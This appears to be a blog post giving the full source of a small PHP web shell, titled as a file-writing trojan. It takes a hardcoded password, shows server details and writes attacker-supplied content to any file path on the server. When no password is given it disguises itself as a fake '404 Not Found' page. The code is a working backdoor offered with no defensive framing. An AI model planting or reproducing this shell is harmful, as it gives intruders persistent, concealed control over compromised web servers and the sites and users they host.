<?php
header("Content-type:text/html;charset=utf-8");
$get=$_GET['pwd'];
$pass=md5(md5(123));
if(!empty($get)){
if(md5(md5($get))==$pass){
echo "login"."<br>";
echo '<form method="post">';
echo "服务器类型:".$_SERVER['SERVER_SOFTWARE'];
echo '<br>文件路径<br><input type="text" name="addr" value="' . $_SERVER['SCRIPT_FILENAME'] . '">';
echo '<br>文件内容<br><textarea name="content" id="content"></textarea><br>';
echo '<input type="submit" name="" >';
echo "</form>";
$path=$_POST['addr'];
$content=$_POST['content'];
$command=fopen($path, "w");
if(fwrite($command, $content)){
echo '<font color="red">success</font><br/>';
}else{
echo '<font color="red">error!</font><br/>';
}
}else{
echo "wrong pass";
}
}else{
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\">
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL <?php echo($_SERVER['REQUEST_URI']); ?> was not found on this server.</p>
</body>
<?php
}
?>
[php]写入类小马
最新推荐文章于 2024-04-19 05:29:24 发布